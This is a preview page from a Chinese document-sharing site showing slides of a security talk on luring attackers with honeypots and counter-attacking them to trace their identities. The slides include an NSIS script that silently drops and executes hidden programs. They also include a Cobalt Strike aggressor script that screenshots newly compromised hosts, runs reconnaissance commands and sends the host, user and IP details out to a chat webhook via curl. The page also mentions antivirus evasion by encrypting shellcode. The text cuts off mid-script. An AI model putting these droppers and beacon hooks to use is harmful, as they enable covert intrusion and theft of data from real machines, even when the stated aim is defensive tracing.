- 1、本文档共17页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
从实战角度总结反制思路
演讲嘉宾 张天力
平安健康互联网
《从实战角度总结反制思路》
目录
CONTENTS
反制与溯源介绍
PART 1
反制与溯源
01
在传统攻防对抗中,防守方一般都处在被动的一面,只能被动的接受攻击,溯源技术可以通过攻击行为的特征追踪到行为主体的攻击主机、攻击控制主机、攻击者、攻击组织机构等信息。
01
溯源技术与反制技术是相辅相成的。大部分溯源工作只能利用现有的安全设备的告警去提取有用信息进行溯源,随着攻防演练的模式日趋成熟,攻击者对隐藏自己入侵痕迹也更佳得心应手,只依赖溯源技术效果减退。
攻击反制技术与常规溯源技术完全相反,防守方可以在前期准备时在互联网上刻意部署一些诱导信息,比如github诱饵、各类网盘信息、伪装的脚本、伪装的漏洞服务,攻击者在进行信息收集之后会尝试进行深入利用,防守人员即可通过已部署好的诱捕蜜罐反制攻击者,从攻击者的vps上获取其个人信息从而达到溯源目的,这样防守人员从被动化为主动。
反制与溯源
诱捕与反制
PART 2
02
布防准备
攻击者进行攻击
防守方反制
溯源
前期准备
前期部署蜜罐与布防散步消息。
攻击者攻击
攻击者收集信息收集到诱捕蜜罐进行攻击
反制
防守人员通过诱捕机制反制攻击者获取权限
溯源
诱捕与反制实战
收集攻击者详细的身份信息。
02
诱捕与反制实战
如何诱捕?
Github
百度云
百度文库
FREEBUF
01
诱捕与反制实战
好饵
01
诱捕与反制实战
好钩
木马免杀
通常是CS客户端生成远控shellcode,
然后对shellcode进行加密。
02
诱捕与反制实战
好钩
NSIS解压释放
!define MUI_ICON X:\nsis\xx.ico
Icon X:\nsis\xx.ico
Outfile XX.exe
InstallDir $TEMP
SetCompressor /SOLID lzma
SilentInstall silent
SilentUninstall silent
Section
HideWindow
File XX.exe
File XXX.exe
Exec XX.exe Exec XXX.exe
Delete $XX.exe
Delete $XXX.exe SectionEnd
02
好饵+好钩?没有渔具怎么行
诱捕与反制实战
02
好饵+好钩?没有渔具怎么行
诱捕与反制实战
#Screenshot when shangxian..
$teamserver_hostname = ;
on beacon_initial {
println(Initial Beacon Checkin: . $1 . PID: . beacon_info($1, pid));
local($internalIP $computerName $userName);
bscreenshot($1,0);
bshell($1,echo ========== ipconfig /all echo ---------- whoami echo ---------- date /t echo ---------- time /t echo ========== dir C:\Users\.$userName.\Desktop echo ----------);
$internalIP = replace(beacon_info($1, internal), , _);
$computerName = replace(beacon_info($1, computer), , _);
$userName = replace(beacon_info($1, user), \s+|\*, );
$message = Message from .$teamserver_hostname. Server\n目标成功上线:\n计算名 : .$computerName.\n用户名 : .$userName.\nIP地址 : .$internalIP;
@curl_command = @(curl,/robot/send?access_token=XXX,-H,Content-Type: application/json,-d,{msgtype: text,text: {content: Cobalt Strike 上线了一台主机\n.$message.\n},at: {isAtAll:true}});
exec(@curl_command);
}
on r
您可能关注的文档
- CTF中的代码变形技术和难度分析.pdf
- DaoCloud 基于KubeEdge的边缘计算实践之路.pdf
- EdgeMesh:边缘计算场景中服务网格的延伸和扩展.pdf
- houdini编译机制探索.pdf
- KubeEdge社区最新进展与未来发展展望.pdf
- KubeSphere + KubeEdge 轻松实现海量边缘节点与边缘设备管理.pdf
- 平安SRC沙龙:固件拼图—记一次IoT设备中加密固件的解析.pptx
- 平安SRC沙龙:以攻促防之可恶的FASTJSON.pptx
- 设备管理-KubeEdge SIG Device IOT 进展介绍.pdf
- 烧烤店装修费用分析.docx
- 2024年03月广西龙州县2024年引进15名高层次(急需紧缺)人才笔试历年高频考点(难、易错点荟萃)附带答案详解.docx
- 2024年03月北京市残疾人联合会所属事业单位招考聘用笔试历年高频考点(难、易错点荟萃)附带答案详解.docx
- 2024年03月安徽省社会科学院引进高层次人才12人笔试历年高频考点(难、易错点荟萃)附带答案详解.docx
- 2024年03月广东省茂名滨海新区渔港服务中心2024年公开招考3名工作人员笔试历年高频考点(难、易错点荟萃)附带答案详解.docx
- 2024年03月中国农业科学院饲料研究所开招考聘用笔试历年高频考点(难、易错点荟萃)附带答案详解.docx
- 2024年03月中国地质调查局昆明自然资源综合调查中心2024年度公开招考56名工作人员笔试历年高频考点(难、易错点荟萃)附带答案详解.docx
- 八角项目人力资源管理方案.docx
- 2024年03月广州市海珠区素社街道环监所2024年公开招考1名工作人员笔试历年高频考点(难、易错点荟萃)附带答案详解.docx
- 羊肉加工项目财务管理方案.docx
- 奶油项目市场营销方案.docx
文档评论(0)